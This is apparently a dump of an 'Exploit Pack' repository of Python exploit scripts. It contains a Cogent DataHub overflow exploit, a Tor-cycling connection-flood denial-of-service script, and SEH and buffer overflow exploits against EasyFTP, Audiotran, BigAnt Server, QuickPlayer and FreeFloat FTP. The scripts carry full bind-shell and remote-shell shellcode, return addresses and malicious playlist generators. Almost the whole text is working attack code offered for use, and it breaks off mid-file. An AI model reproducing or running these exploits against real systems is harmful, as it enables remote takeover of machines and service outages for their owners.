66 | align += "\x59" # pop ecx
67 | align += "\x08" # add [eax],cl (carve a 'RETN' onto the stack)
68 | align += "\x6f"
69 | align += "\x40" # inc eax
70 | align += "\x6f"
71 | align += "\x40" # inc eax
72 | align += "\x6f\x41" * (48) # inc ecx (will not effect to our payload)
73 | align += "\x6f"
74 | align += "\x62" # becomes our carved RETN on the stack (0x61+0x62=0xc3)
75 |
76 | request = "(domain \""
77 | request += "\x61" * 1019
78 | request += "\x7f\x55" # jmp esp 0x0055007f
79 | request += align
80 | request += shellcodez
81 | request += "\")\r\n"
82 |
def banner():
    """Return the multi-line banner text shown at start-up and before the usage line.

    Returns:
        str: the banner, beginning and ending with a newline, with no
        trailing prompt or blank line appended.
    """
    # The local is named after the function; it only shadows `banner`
    # inside this body, so the recursion-looking name is harmless.
    banner = "\n-----------------------------------------------------\n"
    banner += "------ Cogent Datahub Unicode Overflow Exploit ------\n"
    banner += "------------- Found by Luigi Auriemma ---------------\n"
    banner += "--------- SYSTEM exploit by Steven Seeley -----------\n"
    return banner
89 |
90 | if len(sys.argv) < 2:
91 | print banner()
92 | print "(-) Usage: %s " % sys.argv[0]
93 | sys.exit(0)
94 |
95 | target = sys.argv[1]
96 | print banner()
97 |
98 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
99 | try:
100 | s.connect((target,4502))
101 | except:
102 | print "[-] Connection to %s failed! % (target)"
103 | sys.exit(0)
104 |
105 | print "(+) Sending overflow..."
106 | s.send(request)
107 | s.recv(1024)
108 | # wait for the target, sheesh.
109 | time.sleep(2)
110 | print "(+) Getting shell.."
111 | s.close()
112 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/DenialOfService80.py:
--------------------------------------------------------------------------------
1 | # Copyright - Exploit Pack 2012
2 | #
3 | import socket, os, sys, time
4 |
5 | CONNECTIONS = 8
6 | THREADS = 48
7 |
def make_socket(host,port):
    """Open a TCP connection to host:port and return the connected socket.

    Every address returned by ``socket.getaddrinfo`` is tried in order; the
    first one that both creates a socket and connects is used.  The function
    never returns ``None``: if no candidate connects it prints a message and
    terminates the process with ``sys.exit(0)`` instead.

    Args:
        host: hostname or address passed straight to ``getaddrinfo``.
        port: port number or service name passed straight to ``getaddrinfo``.

    Returns:
        A connected ``socket.socket``.
    """
    # NOTE(review): AI_PASSIVE is a bind()-side hint; it has no effect on the
    # connect() done below, so it could be dropped without changing behaviour.
    for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM, 0, socket.AI_PASSIVE):
        af, socktype, proto, canonname, sa = res
        try:
            s = socket.socket(af, socktype, proto)
        except socket.error, msg:
            s = None
            continue
        try:
            s.connect(sa)
        except socket.error, msg:
            # Release the socket before moving on to the next candidate.
            s.close()
            s = None
            continue
        break
    # NOTE(review): if getaddrinfo yields an empty list, `s` is never bound
    # and this comparison raises NameError instead of reaching the exit path.
    if s is None:
        print 'could not open socket'
        sys.exit(0)
    print 'Connected by', host, port
    return s
28 |
29 | def attack(host, port, id):
30 | sockets = []
31 | for x in range(CONNECTIONS):
32 | sockets.insert(x,0)
33 | while True:
34 | for x in range(CONNECTIONS):
35 | if not sockets[x]:
36 | sockets[x] = make_socket(host,port)
37 | try:
38 | sockets[x].send("\0")
39 | print "[" + str(id) + ": Shake that child]\n"
40 | except socket.error:
41 | sockets[x].close()
42 | sockets[x] = make_socket(host,port)
43 | print "[" + str(id) +": Shake that child]\n"
44 | time.sleep(300000/1000000.0)
45 |
46 |
47 |
48 |
49 | def cycle_identity():
50 | socket = make_socket("localhost", "9050")
51 | socket.write("AUTHENTICATE \"\"\n")
52 | while True:
53 | socket.write("signal NEWNYM\n\x00")
54 | print "[" + str(socket) + ": cycle_identity -> signal NEWNYM\n"
55 | time.sleep(300000/1000000.0)
56 |
57 | def main():
58 | if len(sys.argv) != 3:
59 | cycle_identity()
60 | for x in range(THREADS):
61 | from multiprocessing import Process
62 | p = Process(target=attack, args=(sys.argv[1],int(sys.argv[2]),x))
63 | p.start()
64 | time.sleep(200000/1000000.0)
65 | return 0
66 |
67 | if __name__ == "__main__":
68 | main()
69 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/EasyFTPServer1.7.11.py:
--------------------------------------------------------------------------------
1 | # Script Author: Karn Ganeshen
2 | # Thanks for letting us use this script on Exploit Pack
3 |
4 | import socket
5 | import sys
6 |
7 | Target = sys.argv[1]
8 | Port = int(sys.argv[2])
9 | ShellcodeType = sys.argv[3]
10 |
11 | BufferSize = 268
12 |
13 | remoteshell =("\x89\xE5"
14 | "\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06"
15 | "\x6A\x01\x6A\x02\xB8"
16 | "\x6A\x8B\xAB\x71"
17 | "\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0"
18 | "\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5"
19 | "\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8"
20 | "\x80\x44\xAB\x71"
21 | "\xFF\xD0\x6A\x01\x53\xB8"
22 | "\xD3\x8C\xAB\x71"
23 | "\xFF\xD0\x33\xC0\x50\x50\x53\xB8"
24 | "\x40\x10\xAC\x71"
25 | "\xFF\xD0\x8B\xD8\xBA"
26 | "\x63\xD3\x81\x7C"
27 | "\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2"
28 | "\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63"
29 | "\x6D\x64\x8D\x45\xFC\x50\xB8"
30 | "\xC7\x93\xC2\x77"
31 | "\xFF\xD0"
32 | "\x31\xC0\x50\xB8"
33 | "\xFA\xCA\x81\x7C"
34 | "\xFF\xD0")
35 |
36 | executecode=("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"
37 | "\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"
38 | "\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"
39 | "\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"
40 | "\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"
41 | "\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"
42 | "\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"
43 | "\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"
44 | "\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"
45 | "\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"
46 | "\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"
47 | "\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"
48 | "\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"
49 | "\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"
50 | "\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"
51 | "\x51\x6b\x28")
52 |
53 | if ShellcodeType == "R":
54 | Shellcode=remoteshell
55 | if ShellcodeType == "E":
56 | Shellcode=executecode
57 | if ShellcodeType == "C":
58 | Shellcode=executecode
59 | if ShellcodeType == "L":
60 | Shellcode=executecode
61 |
62 | eip = "\x91\xC8\x41\x7E" # CALL EDI - user32.dll
63 |
64 | nops = "\x90" * (BufferSize-len(Shellcode))
65 |
66 | def ExploitEasyFTP(Target, Port):
67 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
68 | connect = s.connect((Target, Port))
69 | s.recv(1024)
70 | s.send('User anonymous\r\n')
71 | s.recv(1024)
72 | s.send('PASS anonymous\r\n')
73 | s.send('CWD '+ nops + Shellcode + eip + '\r\n')
74 | s.recv(1024)
75 | s.send('QUIT ftp\r\n')
76 | s.close()
77 |
78 |
79 |
80 | ExploitEasyFTP(Target, Port)
81 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/Example.py:
--------------------------------------------------------------------------------
1 | #Exploit Pack - Security Framework for Exploit Developers
2 | #Copyright 2011 Juan Sacco http://exploitpack.com
3 | #
4 | #This program is free software: you can redistribute it and/or modify it under the terms of the
5 | #GNU General Public License as published by the Free Software Foundation, either version 3
6 | #or any later version.
7 | #
8 | #This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
9 | #without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
10 | #PURPOSE. See the GNU General Public License for more details.
11 | #
12 | #You should have received a copy of the GNU General Public License along with this program.
13 | #If not, see http://www.gnu.org/licenses/
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/ExploitAudiotran.py:
--------------------------------------------------------------------------------
1 | #Audiotran 1.4.2.4 SEH Overflow Exploit 0 day
2 | #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
3 | #Web - http://www.aslitsecurity.com/
4 | #Blog - http://www.aslitsecurity.blogspot.com/
5 | #Download Vulnerable application from http://www.e-soft.co.uk/Audiotran.htm
6 | #Vulnerable version Audiotran 1.4.2.4
7 | #Tested on XP SP2
8 | #Greets Villy, Puneet Jain, Abhishek Sahni and ASL IT SECURITY TEAM
9 | #!/usr/bin/python
10 | #To load the playlist file in audiotran copy the ASL.pls
11 | #file in C:\Program Files\Audiotran and click on
12 | #load playlist and double-click on ASL.pls
13 |
14 | import sys
15 | import os
16 | # En este exploit no se usa el argv1
17 | host = sys.argv[1]
18 | # En este exploit no se usa el argv2
19 | port = int(sys.argv[2])
20 | shellcodetosend = int(sys.argv[3])
21 |
22 | #windows/exec - CMD=calc.exe
23 | inofensivo = ("\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA"
24 | "\x4C\xA8\x75\x76\x83\xC0\x04\x31\x50\x13\x03\x1C\xBB\x97\x83\x60"
25 | "\x53\xDE\x6C\x98\xA4\x81\xE5\x7D\x95\x93\x92\xF6\x84\x23\xD0\x5A"
26 | "\x25\xCF\xB4\x4E\xBE\xBD\x10\x61\x77\x0B\x47\x4C\x88\xBD\x47\x02"
27 | "\x4A\xDF\x3B\x58\x9F\x3F\x05\x93\xD2\x3E\x42\xC9\x1D\x12\x1B\x86"
28 | "\x8C\x83\x28\xDA\x0C\xA5\xFE\x51\x2C\xDD\x7B\xA5\xD9\x57\x85\xF5"
29 | "\x72\xE3\xCD\xED\xF9\xAB\xED\x0C\x2D\xA8\xD2\x47\x5A\x1B\xA0\x56"
30 | "\x8A\x55\x49\x69\xF2\x3A\x74\x46\xFF\x43\xB0\x60\xE0\x31\xCA\x93"
31 | "\x9D\x41\x09\xEE\x79\xC7\x8C\x48\x09\x7F\x75\x69\xDE\xE6\xFE\x65"
32 | "\xAB\x6D\x58\x69\x2A\xA1\xD2\x95\xA7\x44\x35\x1C\xF3\x62\x91\x45"
33 | "\xA7\x0B\x80\x23\x06\x33\xD2\x8B\xF7\x91\x98\x39\xE3\xA0\xC2\x57"
34 | "\xF2\x21\x79\x1E\xF4\x39\x82\x30\x9D\x08\x09\xDF\xDA\x94\xD8\xA4"
35 | "\x05\x77\xC9\xD0\xAD\x2E\x98\x59\xB0\xD0\x76\x9D\xCD\x52\x73\x5D"
36 | "\x2A\x4A\xF6\x58\x76\xCC\xEA\x10\xE7\xB9\x0C\x87\x08\xE8\x6E\x46"
37 | "\x9B\x70\x5F\xED\x1B\x12\x9F")
38 |
39 | # Shellcode port 58821
40 | ofensivo=("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
41 | "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
42 | "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
43 | "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
44 | "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
45 | "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
46 | "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
47 | "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
48 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
49 | "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
50 | "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
51 | "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
52 | "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
53 | "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31" +
54 | "\xdb\x53\x68\x02\x00\xe5\xc5\x89\xe6\x6a\x10\x56\x57\x68" +
55 | "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff" +
56 | "\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7" +
57 | "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
58 | "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44" +
59 | "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56" +
60 | "\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86" +
61 | "\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60" +
62 | "\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5" +
63 | "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f" +
64 | "\x6a\x00\x53\xff\xd5")
65 |
66 |
67 | if shellcodetosend == 1:
68 | shellcodetosend=ofensivo
69 | else:
70 | shellcodetosend=inofensivo
71 |
72 | padding = 'A' * 1308
73 | shortjump = "\xeb\x06\x90\x90"
74 | ret = "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
75 | payload = "\x90" * (9255-len(shellcodetosend)) + shellcodetosend
76 | evilbuff = padding + shortjump + ret + payload
77 |
78 | path = 'exploits/code/output/exploit.pls'
79 | f = open(path,mode='wb')
80 | f.write(evilbuff)
81 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/ExploitBIGAntServer.py:
--------------------------------------------------------------------------------
1 | import socket, sys
2 |
3 | host = sys.argv[1]
4 | port = int(sys.argv[2]) # port 6660 by default
5 |
6 | # windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
7 | # EXITFUNC=seh, LPORT=4444, RHOST=
8 | shellcode = (
9 | "\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
10 | "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
11 | "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
12 | "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
13 | "\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
14 | "\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
15 | "\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
16 | "\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
17 | "\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
18 | "\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
19 | "\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
20 | "\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
21 | "\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
22 | "\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
23 | "\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
24 | "\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
25 | "\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
26 | "\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
27 | "\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
28 | "\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
29 | "\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
30 | "\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
31 | "\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
32 | "\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
33 | "\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
34 | "\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
35 | "\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
36 | "\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
37 | "\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
38 | "\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
39 | "\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
40 | "\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
41 | "\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
42 | "\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
43 | "\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
44 | "\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
45 | "\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
46 | "\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
47 | "\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
48 | "\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
49 | "\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
50 | "\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
51 | "\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
52 | "\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
53 | "\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
54 | "\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
55 | "\x4b\x4f\x4e\x30\x41\x41")
56 |
57 |
58 | payload = "\x41" * 985 # seh overwritten at 989
59 | next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
60 | seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
61 | nops = "\x90" * 10 # nop sled
62 | sc = shellcode # 710 bytes available for shellcode
63 |
64 | print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
65 | print "[*] Written and discovered by Blake"
66 | print "[*] Tested on Windows XP SP3\n"
67 |
68 | print "[+] Connecting to %s on port %d" % (host,port)
69 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
70 | try:
71 | s.connect((host,port))
72 | except:
73 | print "[x] Error establishing connection\n"
74 | sys.exit(0)
75 |
76 | print "[+] Sending payload"
77 | s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
78 | s.close()
79 | print "[+] Connect to bind shell on port 4444\n"
80 |
81 | # milw0rm.com [2009-09-15]
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/ExploitQuickPlayer.py:
--------------------------------------------------------------------------------
1 | #TYPE: Clientside
2 | #PORT: NO
3 | #SERVICES: NO
4 |
5 | # Modificado para INSECT Pro por Juan Sacco
6 |
7 | import sys
8 | import os
9 | # En este exploit no se usa el argv1
10 | host = sys.argv[1]
11 | # En este exploit no se usa el argv2
12 | port = int(sys.argv[2])
13 | ShellcodeType = sys.argv[3]
14 |
15 | # windows\exec calc.exe unicode uppercase shellcode
16 | executecode=("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAP"
17 | "AZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB3Y9R8Z9L8Y2RJT1N0V0Y0I0I0I0I0"
18 | "I0I0I0I0I0I0C0C0C0C0C0C070Q0Z1Z110X0P001100112K11110Q02110B020B0B000B0B110B0X0P0"
19 | "8110B2U0J0I0I2L0M080N1Y0E0P0G2P0C000Q2P0K090K0U0E1Q0H0R0B0D0L0K0B2R0P000L0K0F020"
20 | "F2L0L0K0C1R0G1T0N2K0Q1R0D1X0D0O0L2W0C2Z0E2V0E1Q0I2O0F0Q0K2P0L2L0E2L0Q2Q0C0L0E0R0"
21 | "D2L0G0P0O010J2O0D0M0G2Q0K2W0I2R0H2P0P0R0C1W0N2K0B2R0B000L0K0P0B0G0L0G2Q0H0P0N2K0"
22 | "C2P0Q1X0K050K2P0P2T0Q0Z0E0Q0H0P0B2P0N2K0C2X0F2X0L0K0B2X0E2P0E0Q0N030I2S0G0L0P0I0"
23 | "N2K0G0D0N2K0F1Q0I0F0P010I2O0E1Q0O000L2L0J1Q0H0O0F2M0C010O070G0H0K0P0B0U0L040E0S0"
24 | "C0M0K0H0E2K0Q2M0Q040P2U0K0R0P0X0N2K0F080G0T0C010I0C0E060N2K0F2L0B2K0N2K0B2X0G2L0"
25 | "C010K1S0N2K0G2T0L0K0C010H0P0L0I0Q0T0D1T0E2T0C2K0C2K0P1Q0B2Y0P0Z0P0Q0I2O0K0P0C1X0"
26 | "C2O0C1Z0N2K0F2R0H2K0L0F0C2M0B0J0E0Q0N2M0N1U0O0I0G2P0C000E0P0B2P0Q2X0P010N2K0P2O0"
27 | "O2W0K0O0J2U0M2K0J0P0N0U0I020F060E080N0F0L0U0O0M0M0M0K0O0I0E0E2L0F1V0Q2L0F1Z0M0P0"
28 | "K0K0M000Q1U0G2U0O0K0P0G0D0S0Q1R0P2O0P1Z0C000Q0C0K0O0J2U0E030C0Q0P2L0E030D2N0B0E0"
29 | "D080Q2U0C000E0Z1111KPA")
30 |
31 | if ShellcodeType == "R":
32 | Shellcode=remoteshell
33 | if ShellcodeType == "E":
34 | Shellcode=executecode
35 | if ShellcodeType == "C":
36 | Shellcode=executecode
37 | if ShellcodeType == "L":
38 | Shellcode=executecode
39 |
40 | #header
41 | head = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D"
42 |
43 | junk = "\x41" * 530
44 | junk += "\x61\x62\x41\x4a\x58\x6d\x05\x21\x11\x6d\x2d\x20\x11\x6d\x50\x6d\xc3"
45 | junk += "\x41" * 111
46 |
47 | padding = "\x90" * (20000-len(junk+Shellcode))
48 |
49 | evilbuff = head + junk + Shellcode + padding
50 |
51 | path = 'exploits/code/output/exploit.m3u'
52 | f = open(path,mode='wb')
53 | f.write(evilbuff)
54 | f.close()
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/FreeFloatFTPServer.py:
--------------------------------------------------------------------------------
1 | # Script Author: Shahin
2 | # Thanks for letting us use this script on Exploit Pack
3 |
4 | import socket, sys
5 | from struct import pack
6 |
7 |
8 | if len(sys.argv) != 3:
9 | sys.exit(0)
10 |
11 | target = sys.argv[1]
12 | port = int(sys.argv[2])
13 |
14 | # 728 bytes for shellcode
15 | #Bind Shell shellcode port 4444
16 | shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
17 | "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
18 | "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
19 | "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
20 | "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
21 | "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
22 | "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
23 | "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
24 | "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
25 | "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
26 | "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
27 | "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
28 | "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
29 | "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
30 | "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
31 | "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
32 | "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
33 | "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
34 | "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
35 | "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
36 | "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
37 | "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
38 | "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
39 | "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
40 | "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a")
41 |
42 | buffer = "\x41" * 230
43 | eip = pack(' calc.exe
13 | shellcode =(
14 | "\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
15 | "\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8"
16 | "\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19"
17 | "\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49"
18 | "\x5e\xc9\xed\x93\xb3\x29\xcf\x5c\xc6\x28\x08\x80\x29\x78\xc1"
19 | "\xcf\x98\x6d\x66\x8d\x20\x8f\xa8\x9a\x19\xf7\xcd\x5c\xed\x4d"
20 | "\xcf\x8c\x5e\xd9\x87\x34\xd4\x85\x37\x45\x39\xd6\x04\x0c\x36"
21 | "\x2d\xfe\x8f\x9e\x7f\xff\xbe\xde\x2c\x3e\x0f\xd3\x2d\x06\xb7"
22 | "\x0c\x58\x7c\xc4\xb1\x5b\x47\xb7\x6d\xe9\x5a\x1f\xe5\x49\xbf"
